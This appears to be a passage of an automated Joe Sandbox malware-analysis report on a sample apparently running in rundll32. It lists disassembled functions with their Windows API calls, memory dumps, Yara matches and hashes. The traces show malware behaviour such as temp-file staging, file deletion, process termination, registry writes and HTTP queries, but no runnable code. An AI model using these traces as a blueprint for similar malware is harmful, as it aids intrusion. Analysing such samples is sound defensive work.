                                            • SetEvent.KERNEL32(?), ref: 049F5F48
                                            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 049F5F7A
                                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 049F5F9F
                                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 049F5FBF
                                            • GetLastError.KERNEL32 ref: 049F5FD1
                                              • Part of subcall function 049F3A6F: WaitForMultipleObjects.KERNEL32(00000002,049F7B35,00000000,049F7B35,?,?,?,049F7B35,0000EA60), ref: 049F3A8A
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • GetLastError.KERNEL32(00000000), ref: 049F6006
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                            • String ID:
                                            • API String ID: 3369646462-0
                                            • Opcode ID: 22cbf9af601d26ed4afbbf734961aedf1a808dd4b303ae4db7fa315fd33a3f19
                                            • Instruction ID: 4410a29c88b50175640e818b04fae76d1295143c691af284a142d4403d84b4fa
                                            • Opcode Fuzzy Hash: 22cbf9af601d26ed4afbbf734961aedf1a808dd4b303ae4db7fa315fd33a3f19
                                            • Instruction Fuzzy Hash: 2F3100B5900309FFDB20DFA5CC84E9EBBBCEB09314F144979DA02A2141D735AA499F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058043CF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • lstrlen.KERNEL32(00000000,?,00000F00), ref: 058043F3
                                              • Part of subcall function 0580B865: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B876
                                              • Part of subcall function 0580B865: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B87D
                                              • Part of subcall function 0580B865: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0580B88F
                                              • Part of subcall function 0580B865: _snprintf.NTDLL ref: 0580B8B5
                                              • Part of subcall function 0580B865: _snprintf.NTDLL ref: 0580B8E9
                                              • Part of subcall function 0580B865: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0580B906
                                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 0580448D
                                            • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 058044AA
                                            • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 058044B2
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 058044C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                            • String ID: s:
                                            • API String ID: 2960378068-2363032815
                                            • Opcode ID: 00aa372c36d7c90ac7b3562db572540140792c8ee3519421aa06461aa079fa5c
                                            • Instruction ID: a35ef651b996416a7ad863cbbd44322dbb3a527f2169ea8f4c1ed2d2499b0fc1
                                            • Opcode Fuzzy Hash: 00aa372c36d7c90ac7b3562db572540140792c8ee3519421aa06461aa079fa5c
                                            • Instruction Fuzzy Hash: BA314376A00215AFDF60EBE9CC89FDE7FACAF04211F004555FE05E2251EB7469448761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058113CC Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 058113E2
                                            • lstrcmpiW.KERNEL32(00000000,?), ref: 0581141A
                                            • lstrcmpiW.KERNEL32(?,?), ref: 0581142F
                                            • lstrlenW.KERNEL32(?), ref: 05811436
                                            • CloseHandle.KERNEL32(?), ref: 0581145E
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0581148A
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 058114A8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                            • String ID:
                                            • API String ID: 1496873005-0
                                            • Opcode ID: 83c3d5b7f2e2df4dc9a634289d6d12901e4446267e50a9bf870f42ada98b20ed
                                            • Instruction ID: 1273f5a77e7171aca6dcea278f7baaeeb1c2e96f61173683251ea02f826feddb
                                            • Opcode Fuzzy Hash: 83c3d5b7f2e2df4dc9a634289d6d12901e4446267e50a9bf870f42ada98b20ed
                                            • Instruction Fuzzy Hash: 192119B1610309ABEB209FA5DC89EAA7FBDBF14641B048524FE02E2151DB35ED45CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581A806 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(05811B23,00000000,05829440,05829460,?,?,05811B23,0581C387,05829440), ref: 0581A816
                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0581A82C
                                            • lstrlen.KERNEL32(0581C387,?,?,05811B23,0581C387,05829440), ref: 0581A834
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0581A840
                                            • lstrcpy.KERNEL32(05829440,05811B23), ref: 0581A856
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05811B23,0581C387,05829440), ref: 0581A8AA
                                            • HeapFree.KERNEL32(00000000,05829440,?,?,05811B23,0581C387,05829440), ref: 0581A8B9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                            • String ID:
                                            • API String ID: 1531811622-0
                                            • Opcode ID: 101096eb29e78678ac64dfd64bc9a97b2feb3eec6c5f83fbee62c53ba836f9b4
                                            • Instruction ID: 9ee1e7921b793ea7e34a04f46d9849fbc09f81db8a40c494d542d89f00bdff99
                                            • Opcode Fuzzy Hash: 101096eb29e78678ac64dfd64bc9a97b2feb3eec6c5f83fbee62c53ba836f9b4
                                            • Instruction Fuzzy Hash: E221C531104244BFEF224F68DC46FAA7FAAEB85210F148059FC4597251CF31AC46C7B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05812C84 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(00000000,?,?,?), ref: 05812CA8
                                              • Part of subcall function 058099C2: lstrcpy.KERNEL32(-000000FC,00000000), ref: 058099FC
                                              • Part of subcall function 058099C2: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 05809A0E
                                              • Part of subcall function 058099C2: GetTickCount.KERNEL32 ref: 05809A19
                                              • Part of subcall function 058099C2: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 05809A25
                                              • Part of subcall function 058099C2: lstrcpy.KERNEL32(00000000), ref: 05809A3F
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000), ref: 05812CE3
                                            • wsprintfA.USER32 ref: 05812CF6
                                            • GetTickCount.KERNEL32 ref: 05812D0B
                                            • wsprintfA.USER32 ref: 05812D20
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                            • String ID: "%S"
                                            • API String ID: 1152860224-1359967185
                                            • Opcode ID: 54906165b60dd8a53f0e2a0625124b7ce23aa111babfc43f9ca874bae3537078
                                            • Instruction ID: bd3dd5b787239e2f5497434a5df5b2d6f09aff499a1423251db70b521223cfd6
                                            • Opcode Fuzzy Hash: 54906165b60dd8a53f0e2a0625124b7ce23aa111babfc43f9ca874bae3537078
                                            • Instruction Fuzzy Hash: BC11DF726063196FC6A0BBA9DC4CE6B7E9CEF85650B018419FD05D7240DE34EC408BB6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05806371 Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,05807F67,00000000,00000000,00000011), ref: 058063B2
                                            • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,05807F67,00000000,00000000,00000011), ref: 05806425
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 2078930461-0
                                            • Opcode ID: 4a560e6557c5165d7885d1e32114d0009feb48242a08ebc25831a2e080126c7a
                                            • Instruction ID: 0c0f424b45530469ddbde12faf77d1bcaba28e659868fa0a890d9e0f1eccce59
                                            • Opcode Fuzzy Hash: 4a560e6557c5165d7885d1e32114d0009feb48242a08ebc25831a2e080126c7a
                                            • Instruction Fuzzy Hash: D6110431241718BBD6B16A22AC8EFAB3E5CEB45761F008121FE02D51E1EA625C9486E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580A1EA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581684C: lstrlen.KERNEL32(00000000,00000000,75BCC740,76CC81D0,?,?,?,0580A203,?,00000000,76CC81D0,?,?,0580ACCC,00000000,05D7C310), ref: 058168B3
                                              • Part of subcall function 0581684C: sprintf.NTDLL ref: 058168D4
                                            • lstrlen.KERNEL32(00000000,75BCC740,?,00000000,76CC81D0,?,?,0580ACCC,00000000,05D7C310), ref: 0580A215
                                            • lstrlen.KERNEL32(?,?,?,0580ACCC,00000000,05D7C310), ref: 0580A21D
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • strcpy.NTDLL ref: 0580A234
                                            • lstrcat.KERNEL32(00000000,?), ref: 0580A23F
                                              • Part of subcall function 05802644: lstrlen.KERNEL32(?,?,?), ref: 05802655
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • StrTrimA.SHLWAPI(00000000,=,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 0580A25C
                                              • Part of subcall function 0581E5A9: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0580A268,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 0581E5B3
                                              • Part of subcall function 0581E5A9: _snprintf.NTDLL ref: 0581E611
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                            • String ID: =
                                            • API String ID: 2864389247-1428090586
                                            • Opcode ID: df7988481fbc7e90b4cd9cb945af585f9f69e797c54d435e14f89c4fc62230dd
                                            • Instruction ID: cd43e9f427996856ca863bd90577c02b9608d5cead8c905574a4dc711d5c88a7
                                            • Opcode Fuzzy Hash: df7988481fbc7e90b4cd9cb945af585f9f69e797c54d435e14f89c4fc62230dd
                                            • Instruction Fuzzy Hash: 12110633B02324BB4A627BBC9C8DC6E3F9C9E896603049126FD01E7240DE35DC4147E6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581E863 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SwitchToThread.KERNEL32(?,?,05813ED5), ref: 0581E88E
                                            • CloseHandle.KERNEL32(?,?,05813ED5), ref: 0581E89A
                                            • CloseHandle.KERNEL32(00000000,76CDF720,?,05804545,00000000,?,?,?,05813ED5), ref: 0581E8AC
                                            • memset.NTDLL ref: 0581E8C3
                                            • memset.NTDLL ref: 0581E8DA
                                            • memset.NTDLL ref: 0581E8F1
                                            • memset.NTDLL ref: 0581E908
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$CloseHandle$SwitchThread
                                            • String ID:
                                            • API String ID: 3699883640-0
                                            • Opcode ID: 947a2b4fa2955313ab83bc4ed69cb8a30f393f267ebde536ec42c3e251469e2a
                                            • Instruction ID: f31022a9baa8d6b008b9164af07f540e4e9d0fe0b2d8dd2e8e1c600628a16bd6
                                            • Opcode Fuzzy Hash: 947a2b4fa2955313ab83bc4ed69cb8a30f393f267ebde536ec42c3e251469e2a
                                            • Instruction Fuzzy Hash: FF11E371A5022067CA717B2DAC0AD9F7E6CFBD6700F048126FD15E7140DE24ADC58FAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05819097 Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058190C8
                                            • wcstombs.NTDLL ref: 058190D9
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810064
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,00000020,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810073
                                            • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 058190FA
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 05819109
                                            • CloseHandle.KERNEL32(00000000), ref: 05819110
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0581911F
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0581912F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                            • String ID:
                                            • API String ID: 417118235-0
                                            • Opcode ID: f59c1f18e3b358ba7e4b01de8fcc0d474c27e1524113aa78337b16f26c24afdc
                                            • Instruction ID: e3ddb80a088184a112ad0b33ad9d5271ff966ac2163c5cce2c27207b19c90cd4
                                            • Opcode Fuzzy Hash: f59c1f18e3b358ba7e4b01de8fcc0d474c27e1524113aa78337b16f26c24afdc
                                            • Instruction Fuzzy Hash: CD119031200215FBEB216B65DC4EBAA7F6CFB04751F108010FD0696190DBB9ACD0CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058099C2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 058099FC
                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 05809A0E
                                            • GetTickCount.KERNEL32 ref: 05809A19
                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 05809A25
                                            • lstrcpy.KERNEL32(00000000), ref: 05809A3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                            • String ID: \Low
                                            • API String ID: 1629304206-4112222293
                                            • Opcode ID: 44d43fcec9244f7374501816190564d74179b6aee91262d193d0c8057f08f9d9
                                            • Instruction ID: 679eec716147fdebc98d5609aac9ad839d6a1ce501cfe7f169d66c03ca054cc5
                                            • Opcode Fuzzy Hash: 44d43fcec9244f7374501816190564d74179b6aee91262d193d0c8057f08f9d9
                                            • Instruction Fuzzy Hash: 6F01D232305624ABDA706AB59C49F6BBF9CEF45651B055124FC01D31D1CF28ED4086B6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05813672 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 05813685
                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05813697
                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 058136C1
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 058136D4
                                            • CloseHandle.KERNEL32(?), ref: 058136DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                            • String ID: 0x%08X
                                            • API String ID: 603522830-3182613153
                                            • Opcode ID: 05d4bca0d968bae3a3d08d8f09b952562523c252a9a4d0d5066997d33081ae45
                                            • Instruction ID: 6d69b5cd3ff5e5f350ebac150424970c11dc0161738bab91d348fd756cdd20f1
                                            • Opcode Fuzzy Hash: 05d4bca0d968bae3a3d08d8f09b952562523c252a9a4d0d5066997d33081ae45
                                            • Instruction Fuzzy Hash: 3F0148B1904229ABDB10AB90DC0ADEEBF7CEF05260F008114B916E2290EB70A645CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05811DFD Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetLastError.KERNEL32(?,?,?,00001000,?,05829314,76CDF750), ref: 05811E7E
                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,05829314,76CDF750), ref: 05811F03
                                            • CloseHandle.KERNEL32(00000000,?,05829314,76CDF750), ref: 05811F1D
                                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,05829314,76CDF750), ref: 05811F52
                                              • Part of subcall function 0581012F: RtlReAllocateHeap.NTDLL(00000000,?,?,0580171E), ref: 0581013F
                                            • WaitForSingleObject.KERNEL32(?,00000064,?,05829314,76CDF750), ref: 05811FD4
                                            • CloseHandle.KERNEL32(F0FFC983,?,05829314,76CDF750), ref: 05811FFB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                            • String ID:
                                            • API String ID: 3115907006-0
                                            • Opcode ID: bbf6fce70aaaaeaba8d24a4d1f3368ff4133e04cb12ffa92daaa77ad5c8c3073
                                            • Instruction ID: 306367511cc1881ce26cff96a6e437453a5d617f92de2c1d36ea6e3af8773e9f
                                            • Opcode Fuzzy Hash: bbf6fce70aaaaeaba8d24a4d1f3368ff4133e04cb12ffa92daaa77ad5c8c3073
                                            • Instruction Fuzzy Hash: E5812871D00219EFDB11DF98C888AADBBB9FF08344F158459EE06EB250C731AD50CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05809BF3 Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 05809C55
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 05809C63
                                            • lstrlenW.KERNEL32(00000010), ref: 05809C73
                                            • lstrlenW.KERNEL32(00000218), ref: 05809C7F
                                            • FileTimeToLocalFileTime.KERNEL32(00000001,?), ref: 05809D6C
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 05809D7A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                                            • String ID:
                                            • API String ID: 1122361434-0
                                            • Opcode ID: 956e95fd12b329e406b2fee1d0992dacfa4874bdbe187ce0b5421d42363c969c
                                            • Instruction ID: 21ed8e65e5fb13131bd911bebc372d0b0a87680ff3ddb2478785b0451089063b
                                            • Opcode Fuzzy Hash: 956e95fd12b329e406b2fee1d0992dacfa4874bdbe187ce0b5421d42363c969c
                                            • Instruction Fuzzy Hash: F1710F71A00209ABCB60DBA9C884EFEBBFDBF08305F144466F945D7251E634A945DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580EC0C Relevance: 9.1, APIs: 6, Instructions: 133registrysynchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                            • WaitForSingleObject.KERNEL32(00000000,?,05D79998,?,00000000,00000000,00000001), ref: 0580ECB6
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0580ECF0
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0580ED13
                                            • RegCloseKey.ADVAPI32(?), ref: 0580ED1C
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0580ED80
                                            • RtlExitUserThread.NTDLL(?), ref: 0580EDB6
                                              • Part of subcall function 058213BB: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0581A2F0,00000000,?,?), ref: 058213D9
                                              • Part of subcall function 058213BB: GetFileSize.KERNEL32(00000000,00000000,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 058213E9
                                              • Part of subcall function 058213BB: CloseHandle.KERNEL32(000000FF,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0582144B
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                            • String ID:
                                            • API String ID: 90276831-0
                                            • Opcode ID: 6a86e36d7b7021a2a9db282cb0c90b66bdbad61b6d7a2ecf96c0b17f5f74f48e
                                            • Instruction ID: 3ad108e64afda13b4b3f4582e2a592e18380fa2428ce0895626c365f6f37dc49
                                            • Opcode Fuzzy Hash: 6a86e36d7b7021a2a9db282cb0c90b66bdbad61b6d7a2ecf96c0b17f5f74f48e
